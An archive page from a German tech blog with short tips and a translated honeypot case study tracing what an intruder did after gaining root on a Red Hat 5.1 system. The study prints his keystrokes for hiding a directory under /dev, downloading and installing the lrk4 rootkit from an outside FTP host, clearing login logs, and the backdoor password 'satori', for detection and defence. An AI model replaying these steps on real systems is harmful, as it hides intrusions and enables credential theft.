Monatliches Archiv für: März, 2008

Was tun gegen lästige Call Center Agents Telefonanrufe?!

Mrz31
2008 Kommentieren Geschrieben von Daniel

Jeder wurde bestimmt schon mal von Umfrageinstituten, Lotteriegesellschaften, Zeitungsverlagen oder Telekommunikationsanbietern angerufen und sollte diverse Fragen beantworten oder ein Abonnement abschließen.
Wenn selbst die geheime Rufnummer nicht mehr weiterhilft sollte einfach der Spies umgedreht werden.

Du stellst einfach die Fragen
Und zwar mit diesem Fragebogen (Download Telefon Gegenscript)

Dieser Fragebogen kann auf jegliche Arten von nervtötenden Anrufen angewendet werden.

Man kann auch folgende Strategien ausprobieren:
* Der Satz: “Sie wissen doch ganz genau, dass Sie Privatpersonen nicht anrufen dürfen!” bringt den lästigen Anrufer fast immer aus dem Konzept.
* Die Aussage: “Ich bin dafür nicht zuständig!” … hilft fast immer!
* Stellen Sie scheinbar offene Fragen, z. B.: Warum rufen Sie gerade mich an und nicht meinen Nachbarn!
* Führen Sie das Gespräch! Sie können den lästigen Werbeanrufer mit Einzelheiten über das Wetter ablenken (Frage: Regnet es bei Ihnen auch?) oder darüber, wie lästig Sie Werbeanrufe finden.
* Schockieren Sie den lästigen Werbeanrufer mit der Frage: Verkaufen Sie auch Blumen?

Doch die mit Abstand sicherste Methode mit lästigen und überflüssigen Telefonwerbungen umzugehen, liegt immer noch in der 10. Strategie:

* Legen Sie einfach auf! Das ist am wirkungsvollsten zum Beenden eines unerwünschten Telefonats. Einfach auflegen und Sie haben Ihre Ruhe.

install psybnc on linux

Mrz31
2008 Kommentieren Geschrieben von Daniel

1. At first download the latest source.
2. wget http://www.psybnc.info/source/psyBNC-2.3.2-7-auto.tar.gz
3. Extract the source with ‘tar -xzf psyBNC-2.3.2-7-auto.tar.gz‘
4. Now type ‘cd psybnc‘
5. AUTO version is named AUTO because install himself. just type: ./setup or ./install
6. Edit the ‘psybnc.conf‘ or create it with “menuconfig” but at first you have to compile it with ‘make menuconfig‘.

Configuration example:

Listening ports – On which port should the psyBNC listen?
Links – Not needed yet.
Bouncer Name – Name your Bouncer. Something like ‘MyBouncer’ works fine.
Host Allows – To allow anyone set this to ‘*’.
Users – Add yourself..
DCC Host – The IP to use for all DCC sessions (if you enabled DCC support). Recommend setting is the same IP which your bnc use.

Setup is complete. Compile your bouncer with “make” in your psyBNC directory. Type ‘./psybnc‘ to start.

Geposted in Linux Stuff

Wo speichert Firefox die Favoriten ab?

Mrz31
2008 1 Kommentar Geschrieben von Daniel

Firefox speichert die Favoriten und andere Benutzerdefinierte einstellungen unter folgendem Pfad ab:

“\%AppData%\Mozilla\Firefox\“

Favoriten/bookmarks:

“\%AppData%\Mozilla\Firefox\Profiles\bookmarks.html”

Geposted in Tipps&Tricks, Win Stuff

Eigenes Widget erstellen unter Mac OSX

Mrz31
2008 Kommentieren Geschrieben von Daniel

[0xff] – Einleitung.
[0x00] – Widgets verstehen.
[0x01] – Woraus besteht ein Widget?
[0x02] – Programmierung eines Widget.
[0x03] – Das Widget erstellen.
[0x04] – Weitere Informationen.

[0xff]
Seit Apples Mac OS X Tiger wurden die Dashboard- Widgets fester Bestandteil des Tiger Desktop’s. Jedoch kaum jemand weiss wie diese Widgets funktionieren und nur die allerwenigsten wie man sich Widgets selber schreiben kann.
Einige Programm Ideen waeren zb.:

+ Stundenplan
+ Terminal
+ netstat
+ fink-list commander

Das sind jetzt natuerlich nur Ideen, denn ich hoffe das durch dieses bisher erste deutschsprachige Tutorial die Widget- Entwicklung schneller voran kommt.

[0x00]

Widgets sind sofort benutzbar sobald das Mac OS X Dashboard aktiv ist und verschwinden wieder sobald das Dashboard inaktiv ist.

Man kann im groben die Widgets in drei Kategorien einordnen:

[a] Accessory Widgets

Sind eigenstaendige Anwendungen die in keiner Abhaengikeit mit dem Internet oder anderen Anwedungen stehen. (Uhren, Planer, Taschenrechner, Notizblaetter)

[b] Application Widgets

Sind Widgets die mit einem anderen Programm gekoppelt sind. Diese Widgets erfuellen meist eine Teilfunktion einer richtigen Anwendung oder dienen der Bedienung einer Anwendung ueber das Dashboard. (iTunes Controller, Address Book Widgets, Mail Widgets)

[c] Information Widgets
Sind Widgets die fuer den Datenaustausch mit dem Internet programmiert sind. Mit ihnen kann man Daten von jedem beliebigen Server abrufen und grafisch verarbeiten. (Weather Info, Flight Status, Stock Prices, Wikipedia)

[0x01]
Um es ganz einfach zu sagen ist ein Widget nichts anderes als eine Website welche nicht im Browser sondern auf dem Dashboard dargestellt wird. Alle Dateien die zu einem Widget gehoeren werden in einem Ordner gesammelt und spaeter dann als Widget fertig “gepresst”. In einem normalen Widget sind meist diese Dateien enthalten:

[a] Main HTML File
Sozusagen die index.html im Widget. In ihr wird das Aussehen des Widgets gespeichert.

[b] Background Image
Das Hintergrundbild des Widgets im PNG Format.

[c] Icon Image
Eine weitere Bild Datei (auch im PNG Format) welches das Widget in der Widgetbar repraesentiert.

[d] Property List File
Die Datei die alle Eigenschaften des gesamten Widgets enthaelt: “Info.plist” Sie identifiziert das ein Widget: Name, Version, Information, Groesse und die optionale Informationen sowie die Main HTML Information sind enthalten.
Der erste Schritt den wir fuer unser Widget machen ist die Main HTML zu schreiben:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body {
 margin: 0;
}
 .helloText {
    font: 24px "Lucida Grande";
    font-weight: bold;
    color: white;
    position: absolute;
    top: 24px;
    left: 30px;
}
</style>
</head>
<body background="xcludedlogo.png">
<h1 class="Text">excluded.org!</h1>
</body>
</html>

Es ist natuerlich auch kein Problem die CSS als eigenstaendige Datei importiert. (@import “style.css”wink Weiter gehts mit der Info.plist. Die Bilder koennt ihr euch ja selber erstellen oder wie in diesem Beispiel das Excluded Logo von Homepage benutzen. Die einfachste Moeglichkeit die Info.plist zu erstellen ist wenn ihr den Property List Editor aus /Developer/Applications/Utilities benutzt. Hier eine Uebersicht welche Keys in der Info.plist erscheinen koennen bzw. muessen:

Key – Name – Beschreibung – Notwendig?

——————————————

CFBundleName – Name des Bundles. - JA

CFBundleDisplayName – Alias des Bundles. – JA

CFBundleIdentifier – Internet Domain Style – JA Identifikation.

CFBundleVersion – Version des Widgets. – JA

MainHTML – Name der Main HTML. – JA

Width Pixel – Laenge des Widgets. - NEIN

Height Pixel – Hoehe des Widgets. – NEIN

CloseBoxInsetX – Horizontales Inset der - NEIN

Close Box.

CloseBoxInsetY – Vertikales Inset der Close Box. – NEIN

Plugin Name – des Widget plug-in’s. – NEIN
[0x03]

Ein neues Widget zu erstellen ist extrem einfach und wenig Zeitaufwendig.

1. Neues Verzeichnis erstellen, um alle Dateien zu sammeln. (Wenn alles fertig: FOLDER.wdgt)

2. Definieren der Info.plist

3. Mit dem Lieblings Texteditor die Main HTML erstellen.

4. Die Main HTML in Safari oeffnen und schauen ob alles funktioniert.

Falls ihr gar keine Ideen habt findet ihr unter /Developer/Examples/Dashboard oder im Internet auf http://developer.apple.com/samplecode/A … -date.html Programm Beispiele.

Und nun noch als letztes muss das Widget in die Haende der anderen User und damit das Dashboard das Widget auch findet muss es in den folgenden Verzeichnis lokalisiert werden:

+ /Library/Widgets

+ ~/Library/Widgets

Um richtig in die Widget Programmierung einzusteigen waere es zu empfehlen sich die Xcode 2.2 developer tools zu Installieren. (Findet man auf der Tiger Installations DVD).
[0x04]

Fuer weitere Informationen:

+ http://developer.apple.com/documentatio … index.html

+ http://developer.apple.com/samplecode/A … -date.html

+ http://www.oreilly.com/catalog/jscript4/index.html

+ http://www.oreilly.com/catalog/css2/index.html

+ http://www.oreilly.com/catalog/dhtmlref/index.html

+ http://developer.apple.com/internet/safari/faq.html

Geposted in Mac Stuff

Den Feind Kennen – Teil 3

Mrz30
2008 Kommentieren Geschrieben von Daniel

Dies ist der dritte Artikel aus einer Serie, die sich auf das Script Kiddie
konzentriert. Der erste Teil beschäftigt sich damit, wie Script Kiddies
Schwächen suchen, identifizieren und ausnutzen. Der zweite Teil erklärt, wie man
solche Versuche erkennt, die eingesetzten Tools identifiziert und erkennt,
wonach gesucht wird. Dieser Teil, der dritte, konzentriert sich darauf, was
passiert, wenn sie erst mal root sind und hier besonders darauf, wie sie ihre
Spuren verwischen und was sie als nächstes tun.

Wer ist das “Script Kiddie”?
wie bereits im ersten Teil erklärt, ist das “Script Kiddie” nicht so sehr eine
Person als vielmehr eine Strtegie: die Strategie, nach dem schnellen Erfolg zu
suchen. Man sucht nicht nach speziellen Informationen oder greift eine spezielle
Firma an, es geht nur darum, so einfach wie möglich root zu werden.
Eindringlinge versuchen das, indem sie sich auf eine kleine Anzahl Schwächen
beschränken und dann das ganze Internet danach absuchen. Dies ist nicht zu
unterschätzen, denn früher oder später finden sie jemand verwundbaren.

Wenn sie erstmal ein verwundbares System gefunden haben und root geworden sind,
werden normalerweise als erstes die Spuren verwischt. Sie möchten sichergehen,
dassDu nicht weißt, dass dein System gehackt wurde und dass Du ihre Aktionen nicht
sehen oder loggen kannst. Danach benutzten sie dein System oft, um andere
Netzwerke zu scannen oder überwachen dein System im Stillen. Um besser zu
verstehen, wie sie dieses bewerkstelligen, folgen wir einfach den Schritten auf
einem System das von einem Eindringling mit Hilfe von “Script Kiddie”-Taktiken
geknackt wurde. Unser System namens Mozart läuft unter Red Hat Linux 5.1 und
wurde am 27.04.1999 kompromittiert. Es folgen die tatsächlichen Schritte, die
der Störenfried gemacht hat, mit den Systemlogs und Tastatureingaben um jeden
Schritt nachvollziehen zu können. Alle Systemlogs wurden auf einem geschützten
Syslogserver abgelegt und alle Eingaben wurden mit Hilfe von sniffit
(ftp://ftp.technotronic.com/unix/network-sniffers) aufgezeichnet. Mehr
Informationen darüber, wie die Informationen gesammelt wurden stehen in “Wie
baut man einen Honigtopf” (http://www.enteract.com/~lspitz/honeypot.html). Im
folgenden wird der Eindringling immer als “er” bezeichnet, obwohl wir keine
Ahnung über das tatsächliche Geschlecht des Täters haben.

Der Angriff
Am 27.04. um 00:13 Uhr wurde unser Netzwerk von einem System 1Cust174.tnt2.long-
branch.nj.da.uu.net auf verschiedene Schwächen inklusive nmap gescannt. Unser
Eindringling hat dabei “Lärm” gemacht, da jedes unserer Systeme getestet wurde
(mehr Informationen über das erkennen und analysieren solcher Scans finden sich
im zweiten Teil).

Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174

Anscheinend hat er etwas gefunden, was ihm gefallen hat, denn er kam am gleichen
Tag noch um 06:52 und 16:47 Uhr zurück. Er begann mit einem intensiveren Test
und konzentrierte sich dabei auf das System Mozart. Er fand eine Schwäche und
startete einen erfolgreichen Angriff gegen mountd, eine allgemein bekannte
Schwachstelle in Red Hat 5.1. Hier kann man in /var/log/messages sehen, wie der
Eindringling root wurde. Das Tool, das er dazu benutzte war wahrscheinlich
ADMountd.c /ftp://adm.freelsd.net/pub/ADM) oder etwas ähnliches.

Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client
208.252.226.174.
Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together
Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to
mount
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~

Direkt im Anschluß sehen wir in /var/adm/messages, wie unser Eindringling root
wurde, indem er sich per Telnet als User crak0 einloggte und sich dann per su
zum User rewt machte. Beide Accounts wurden durch das Angriffsskript angelegt.
Jetzt hat er volle Kontrolle über das System.

Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM
1Cust102.tnt1.long-branch.nj.da.uu.net FOR crak, User not known to the
underlying authentication module
Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user
crak0 by (uid=0)
Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM
1Cust102.tnt1.long-branch.nj.da.uu.net
Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt
by crak0(uid=0)

Spuren verwischen

Der Fremde ist jetzt als root im System. Wie wir jetzt sehen werden, ist sein
nächster Schritt sicherzustellen, das er nicht erwischt wird. Als erstes prüft
er, ob noch andere User angemeldet sind:

[crak0@mozart /tmp]$ w
4:48pm up 1 day, 18:27, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
crak0 ttyp0 1Cust102.tnt1.lo 4:48pm 0.00s 0.23s 0.04s w

Nachdem er festgestellt hat, daß er allein ist, wird alle seine Taten unsichtbar
machen wollen. Das bedeutet normalerweise, das er alle Beweise aus den Logfiles
löscht und Systemdateien wie ps oder netstat durch Trojanische Pferde ersetzt,
so daß man ihn im System nicht erkennen kann. Sind die Trojaner erst einmal
installiert, hat er die totale Kontrolle über das System und Du wirst es sehr
wahrscheinlich niemals herausbekommen. Genauso, wie es Skripte zum
automatisiertem Hacken gibt, gibt es auch Skripte zum automatischen verstecken
von Eindringlingen, oft rootkits genannt. Eines der gebräuchlicheren ist lrk4
(ftp://ftp.technotronic.com/unix/trojans). Durch das Ausführen des Skripts
werden eine Reihe kritischer Dateien ersetzt und tarnen den User in wenigen
Sekunden. Mehr Informationen über rootkits finden sich im Readme von lrk4.
Dadurch bekommt man eine bessere Vorstellung wie diese rootkits im allgemeinen
funktionieren. Ich würde auch empfehlen, hide-and-seek
(http://www.enteract.com/~lspitz/hide-n-seek.html) zu lesen, ein Text über das
Spuren verwischen, geschrieben von den Bösen.

Innerhalb weniger Minuten, nachdem das System kompromittiert war, konnte man
beobachten, wie der Eindringling das rootkit herunterlud und mit “make install”
implementierte. Es folgen seine tatsächlichen Tastatureingaben um sich
unsichtbar zu machen:

cd /dev/
su rewt
mkdir “. ”
cd “. ”
ftp technotronic.com
anonymous
fdfsfdsdfssd@aol.com
cd /unix/trojans
get lrk4.unshad.tar.gz
quit
ls
tar -zxvf lrk4.unshad.tar.gz
mv lrk4 proc
mv proc “. ”
cd “. ”
ls
make install

Beachte, daß er als erstes ein verstecktes Verzeichnis “.” erzeugt, um darin
sein rootkit zu verstecken. Dieses Verzeichnis taucht beim “ls” Befehl nicht auf
und sieht bei einem “ls -la” wie das lokale Verzeichnis aus. Eine Möglichkeit
dieses Verzeichnis zu finden ist das “find” Kommando (stelle sicher, daß Du der
Integrität deiner “find” Datei vertrauen kannst):

mozart #find / -depth -name “*.*”
/var/lib/news/.news.daily
/var/spool/at/.SEQ
/dev/. /. /procps-1.01/proc/.depend
/dev/. /.
/dev/.

Unser Störenfried mag ja gut im Umgang mit Trojanern sein, aber sein Ansatz um
die Logdateien zu säubern, war etwas einfacher gestrickt. Anstatt Tools wie zap2
oder clean zu nutzen, kopierte er einfach /dev/null in die Dateien /var/run/utmp
und /var/log/utmp und löschte /var/log/wtmp. Man ahnt, daß etwas faul ist, wenn
diese Dateien leer sind oder man den folgenden Fehler bekommt:

[root@mozart sbin]# last -10
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last
info.

Der nächste Schritt

Wenn Eindringlinge erst einmal ein System kompromittiert haben, neigen sie dazu,
eines von zwei Dingen zu tun. Entweder sie benutzen das System dazu, andere
Rechner im Internet zu scannen oder sie machen es sich gemütlich und sehen zu,
was sie über Dein System lernen können, z.B. Accounts oder Passwörter für andere
Systeme. Unser Eindringling entschied sich für die zweite Variante: zurücklehnen
und sehen, was man lernen kann. Er installierte einen Sniffer, der unseren
gesamten Netzwerkverkehr abfing, inklusive der Telnet und ftp Verbindungen zu
anderen Systemen. Auf diese Weise konnte er Logins und Passwörter in Erfahrung
bringen. In /var/log/messages sehen wir, wie das System kurz nach dem Einbruch
in den “promiscuous mode” geht:

Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode.

Nachdem er seine Trojaner-Binaries installiert, die Logs gesäubert und den
Sniffer gestartet hatte, trennte der Eindringling die Verbindung. Wir werden ihn
jedoch am nächsten wiederkehren sehen, um herauszufinden, was für Verkehr er
aufgefangen hatte.

Schadensbegrenzung
Da unser Freund die Verbindung gekappt hatte, bekam ich die Möglichkeit das
System zu prüfen und herauszufinden was genau geschehen war. Ich war sehr daran
interessiert herauszufinden, was verändert worden war und wo er die
Informationen, die der Sniffer sammelte, ablegte. Zuerst fand ich mit Hilfe von
tripwire (ftp://coast.cs.purdue.edu/pub/COAST/Tripwire) schnell heraus, welche
Dateien modifiziert waren. Anmerkung: stelle sicher, das tripwire von der
sicheren Quelle gestartet wird. Ich lasse gerne eine statisch gelinkte Version
von einer Floppy mit Schreibschutz laufen. Tripwire zeigte folgendes:

added: -rw-r–r– root 5 Apr 27 17:01:16 1999
/usr/sbin/sniff.pid
added: -rw-r–r– root 272 Apr 27 17:18:09 1999
/usr/sbin/tcp.log
changed: -rws–x–x root 15588 Jun 1 05:49:22 1998 /bin/login
changed: drwxr-xr-x root 20480 Apr 10 14:44:37 1999 /usr/bin
changed: -rwxr-xr-x root 52984 Jun 10 04:49:22 1998 /usr/bin/find
changed: -r-sr-sr-x root 126600 Apr 27 11:29:18 1998 /usr/bin/passwd
changed: -r-xr-xr-x root 47604 Jun 3 16:31:57 1998 /usr/bin/top
changed: -r-xr-xr-x root 9712 May 1 01:04:46 1998
/usr/bin/killall
changed: -rws–s–x root 116352 Jun 1 20:25:47 1998 /usr/bin/chfn
changed: -rws–s–x root 115828 Jun 1 20:25:47 1998 /usr/bin/chsh
changed: drwxr-xr-x root 4096 Apr 27 17:01:16 1999 /usr/sbin
changed: -rwxr-xr-x root 137820 Jun 5 09:35:06 1998 /usr/sbin/inetd
changed: -rwxr-xr-x root 7229 Nov 26 00:02:19 1998
/usr/sbin/rpc.nfsd
changed: -rwxr-xr-x root 170460 Apr 24 00:02:19 1998
/usr/sbin/in.rshd
changed: -rwxr-x— root 235516 Apr 4 22:11:56 1999
/usr/sbin/syslogd
changed: -rwxr-xr-x root 14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd
changed: drwxr-xr-x root 2048 Apr 4 16:52:55 1999 /sbin
changed: -rwxr-xr-x root 19840 Jul 9 17:56:10 1998 /sbin/ifconfig
changed: -rw-r–r– root 649 Apr 27 16:59:54 1999 /etc/passwd

Wie man sehen kann wurde eine Vielzahl von Dateien un Binaries modifiziert. Es
gab keine neuen Einträge in der /etc/passwd (schlauerweise hatte er den crak0
und rewt Eintrag wieder gelöscht), also mußte er in einer der modifizierten
Binaries eine Hintertür offen gelassen haben. Außerdem waren zwei Dateien
hinzugefügt worden, /usr/sbin/sniff.pid und /usr/sbin/tcp.log. Nicht ganz
überraschend war /usr/sbin/sniff.pid die pid des Sniffers und /usr/sbin/tcp.log
war die Datei in der er alle gesammelten Informationen ablegt. Ausgehend von
/usr/sbin/sniff.pid stellte sich heraus, das rpc.nfsd der Sniffer war. Unser
Eindringling hatte einen Sniffer kompiliert, in diesem Fall linsniffer, und
rpc.nfsd damit ersetzt. Das stellte sicher, das auch nach einem reboot der
Sniffer durch den init-Prozeß gestartet wurde. Folgendes bestätigt, das rpc.nfsd
der Sniffer ist:

mozart #strings /usr/sbin/rpc.nfsd | tail -15
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
—– [CAPLEN Exceeded]
—– [Timed Out]
—– [RST]
—– [FIN]
%s =>
%s [%d]
sniff.pid
eth0
tcp.log
cant open log
rm %s

Nachdem ich mein System untersucht und verstanden hatte, was vorgegangen war,
ließ ich es alleine. Ich war neugierig, was seine nächsten Schritte sein würden.
Ich wollte nicht, daß er wußte, daß ich ihn erwischt hatte, deshalb löschte ich
alle meine Spuren aus /usr/sbin/tcp.log.

Die Rückkehr des Script Kiddies
Am nächsten Tag kam unser Freund wieder. Durch loggen seiner Tastatureingaben
fand ich schnell die Hintertür: /bin/login war ein Trojaner. Diese Binary, die
für Telnetsitzungen verwendet wird, war so konfiguriert, das der Account “rewt”
mit dem Passwort “satori” root Rechte erhielt. “satori” ist das Standardpasswort
für alle Trojaner, die von lrk4 installiert werden, ein sicheres
Erkennungszeichen, daß Dein System kompromittiert sein könnte.

Der Eindringling prüfte, ob der Sniffer noch funktionierte. Außerdem wollte er
wissen, ob irgendwelche Accounts seit dem vorherigen Tag abgefangen wurden. Hier
seine Eingaben:

Red Hat Linux release 5.1 (Manhattan)
Kernel 2.0.35 on an i586

mozart login: rewt
Password:
[root@mozart /root]# w
4:11pm up 17:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[root@mozart /root]# ps aux
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
bin 250 0.0 1.1 776 352 ? S 03:32 0:00 portmap
daemon 228 0.0 1.3 796 416 ? S 03:32 0:00 /usr/sbin/atd
root 1 0.0 1.4 792 432 ? S 03:31 0:03 init [3]
root 2 0.0 0.0 0 0 ? SW 03:31 0:00 (kflushd)
root 3 0.0 0.0 0 0 ? SW< 03:31 0:00 (kswapd)
root 4 0.0 0.0 0 0 ? SW 03:31 0:00 (md_thread)
root 5 0.0 0.0 0 0 ? SW 03:31 0:00 (md_thread)
root 36 0.0 1.1 752 364 ? S 03:32 0:00 /sbin/kerneld
root 61 0.0 2.2 1196 688 ? S 03:32 0:00 bash
/etc/rc.d/rc 3
root 208 0.0 0.4 268 152 ? S 03:32 0:00 syslogd
root 217 0.0 1.7 928 548 ? S 03:32 0:00 klogd
root 239 0.0 1.5 864 488 ? S 03:32 0:00 crond
root 261 0.0 2.5 1252 776 ? S 03:32 0:00 /usr/sbin/snmpd
-f
root 273 0.0 0.4 168 140 ? S 03:32 0:00 inetd
root 284 0.0 2.0 1000 620 ? S 03:32 0:00 named
root 297 0.0 2.2 1192 684 ? S 03:32 0:00 sh
/etc/rc.d/rc3.d/S6
root 306 0.0 1.6 852 504 ? S 03:32 0:00 rpc.mountd
root 314 0.0 1.3 876 404 ? S 03:32 0:00 rpc.nfsd
root 599 0.4 2.2 1240 696 ? S 21:11 0:00 in.telnetd
root 600 1.3 2.5 1184 772 p0 S 21:11 0:00 -bash
root 614 0.0 1.2 920 400 p0 R 21:11 0:00 ps aux
[root@mozart /root]# cd /usr/sbin
[root@mozart sbin]# ls
ClockProg innd sendfax
SVGATextMode inndstart sendmail
accton ipop2d set80
adduser ipop3d setVGAreg
am-eject kbdconfig setclock
amd klogd setconsole
amq logrotate setpalette
apmd lpc setup
atd lpd showmount
atrun lpf sliplogin
automount makewhatis smbd
bootpd mk-amd-map smbmount
bootpef mkdict smbumount
bootptest mkpasswd sndconfig
callback mouseconfig sniff.pid
chat named snmpd
chpasswd named-xfer snmptrapd
chroot named.reload squid
clockprobe named.restart squid.novm
create-cracklib-dict ncpserv stm
crond ndc stm-menu
ctlinnd newusers strfile
dbmmanage nmbd swapdev
dhcpd ntpdate syslogd
dhcrelay ntpq tcp.log
dip ntptrace tcpd
diplogin ntsysv tcpdchk
dump-acct nwbind tcpdmatch
dump-utmp nwclient tcpdump
edquota nwconn tickadj
exportfs nwserv timeconfig
faxrunqd pac timed
fixmount packer timedc
fsinfo pmap_dump tmpwatch
fuser pmap_set traceroute
gated portmap try-from
getVGAreg pppd tunelp
getpalette pppstats unstr
grabmode pwck useradd
groupadd pwconv userdel
groupdel pwunconv userhelper
groupmod quotastats usermod
grpck ramsize usernetctl
grpconv rdev uuchk
grpunconv rdistd uucico
hlfsd readprofile uuconv
htdigest repquota uusched
htpasswd rhbackup uuxqt
httpd rmt vidmode
huntd rootflags vipw
imapd routed warnquota
in.comsat rpc.bootparamd wire-test
in.fingerd rpc.mountd wsmbconf
in.ftpd rpc.nfsd xferstats
in.identd rpc.rquotad xntpd
in.nnrpd rpc.rusersd xntpdc
in.ntalkd rpc.rwalld ypbind
in.rexecd rpc.yppasswdd yppoll
in.rlogind rpc.ypxfrd yppush
in.rshd rpcinfo ypserv
in.talkd rwhod ypset
in.telnetd sa zdump
in.tftpd safe_finger zic
in.timed samba
inetd sbpnpprobe
[root@mozart sbin]# paste tcp.log

1Cust118.tnt1.long-branch.nj.da.uu.net => mozart [23]
#’vt1002!rewt
satori
last -210110
cd /log
ls
/cd /var/log
ls

—– [Timed Out]

router => mozart [23]
!”‘#o% 38400,38400′VT100root
fergit
ls
cat /etc/hosts

—– [Timed Out]
Exiting…
[root@mozart sbin]# w
4:11pm up 17:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[root@mozart sbin]# cat /etc/hosts
127.0.0.1 localhost localhost.localdomain
172.20.1.130 mozart mozart
172.20.1.1 router
[root@mozart sbin]# uname -a
Linux mozart 2.0.35 #1 Tue Jul 14 23:56:39 EDT 1998 i586 unknown
[root@mozart sbin]# netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt
Iface
172.20.1.0 * 255.255.255.0 U 1500 0 0
eth0
127.0.0.0 * 255.0.0.0 U 3584 0 0
lo
default router 0.0.0.0 UG 1500 0 0
eth0
[root@mozart sbin]# netstat -rs
netstat: illegal option — s
usage: netstat [-veenNcCF] [] -r netstat {-V|–version|-h|–
help}
netstat [-vnNcaeo] []
netstat { [-veenNac] -i | [-vnNc] -L | [-cnNe] -M }

-r, –route display routing table
-L, –netlink display netlink kernel messages
-i, –interfaces display interface table
-M, –masquerade display masqueraded connections

-v, –verbose be verbose
-n, –numeric dont resolve names
-e, –extend display other/more informations
-c, –continuous continuous listing

-a, –all, –listening display all
-o, –timers display timers

={-t|–tcp} {-u|–udp} {-w|–raw} {-x|–unix} –ax25 –ipx –
netrom
= -A {inet|ipx|netrom|ddp|ax25},… –inet –ipx –netrom –ddp –ax25
[root@mozart sbin]#ls
ClockProg innd sendfax
SVGATextMode inndstart sendmail
accton ipop2d set80
adduser ipop3d setVGAreg
am-eject kbdconfig setclock
amd klogd setconsole
amq logrotate setpalette
apmd lpc setup

[root@mozart sbin]# rpc.nfsd
ÿò[root@mozart sbin]# ps aux
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
bin 250 0.0 1.1 776 352 ? S 03:32 0:00 portmap
daemon 228 0.0 1.3 796 416 ? S 03:32 0:00 /usr/sbin/atd
root 1 0.0 1.4 792 432 ? S 03:31 0:03 init [3]
root 2 0.0 0.0 0 0 ? SW 03:31 0:00 (kflushd)
root 3 0.0 0.0 0 0 ? SW< 03:31 0:00 (kswapd)
root 4 0.0 0.0 0 0 ? SW 03:31 0:00 (md_thread)
root 5 0.0 0.0 0 0 ? SW 03:31 0:00 (md_thread)
root 36 0.0 1.1 752 364 ? S 03:32 0:00 /sbin/kerneld
root 61 0.0 2.2 1196 688 ? S 03:32 0:00 bash
/etc/rc.d/rc 3
root 208 0.0 0.4 268 152 ? S 03:32 0:00 syslogd
root 217 0.0 1.7 928 548 ? S 03:32 0:00 klogd
root 239 0.0 1.5 864 488 ? S 03:32 0:00 crond
root 261 0.0 2.5 1252 776 ? S 03:32 0:00 /usr/sbin/snmpd
-f
root 273 0.0 0.4 168 140 ? S 03:32 0:00 inetd
root 284 0.0 2.0 1000 620 ? S 03:32 0:00 named
root 297 0.0 2.2 1192 684 ? S 03:32 0:00 sh
/etc/rc.d/rc3.d/S6
root 306 0.0 1.6 852 504 ? S 03:32 0:00 rpc.mountd
root 314 0.0 1.3 876 404 ? S 03:32 0:00 rpc.nfsd
root 599 0.0 2.2 1240 696 ? S 21:11 0:00 in.telnetd
root 600 0.1 2.5 1184 772 p0 S 21:11 0:00 -bash
root 626 0.0 1.2 920 400 p0 R 21:12 0:00 ps aux
[root@mozart sbin]# rm tcp.log
rm: remove `tcp.log’? y
[root@mozart sbin]# kill -9 314
[root@mozart sbin]# rm rpc.nfsd

Beachte, das er ganz zum Schluß den Sniffer stoppt. Das war das letzte, was er
vor der Beendigung der Sitzung tat. Er kam jedoch schnell zurück, nur um den
Sniffer neu zu starten. Ich bin mir nicht ganz sicher, warum er das getan hat.

Dieser Vorgang des Systemchecks wiederholte sich für einige Tage. Jeden Tag kam
der Eindringling zurück, um zu prüfen, ob der Sniffer noch lief und ob er
irgendwelche wertvollen Daten gesammelt hatte. Nach dem vierten Tag beschloß
ich, daß es nun genug sei und trennte das System. Ich hatte genug von dem
Eindringling gelernt und schien nichts neues mehr lernen zu können.

Schlußfolgerung

Wir haben hier von Anfang bis Ende gesehen, wie sich ein Eindringling benehmen
könnte, sobald sie erst mal root sind. Sie fangen oft damit an, zu prüfen ob
irgendjemand auf dem System ist. Wenn sie erst mal wissen, daß sie allein sind,
verwischen sie ihre Spuren, indem sie Logfiles säubern und wichtige Dateien
verändern bzw. modifizieren. Wenn sie erst mal sicher versteckt sind starten sie
neue und schädlichere Aktivitäten. Um sich besser gegen diese Bedrohung zu
schützen, empfehle ich seine Systeme zu sichern (panzern). Grundlegender Schutz
reicht für die meisten Script Kiddies da sie nach dem leichten Opfer suchen.
Eine Vorstellung davon, wie man sein System sichert (panzert), bekommt man bei
http://www.enteract.com/~lspitz/linux.html bzw.
http://www.enteract.com/~lspitz/solaris.html. Wenn es zu spät ist und Dein
System schon kompromittiert wurde, kann man hier nachlesen

http://www.cert.org/nav/recovering.html

Geposted in Security Informations

Den Feind erkennen – Teil 2

Mrz30
2008 Kommentieren Geschrieben von Daniel

Dieser Artikel ist der zweite von drei Teilen. Der erste Teil behandelte die
Tools und Methoden der “Script Kiddies”, besonders wie sie nach Schwachstellen
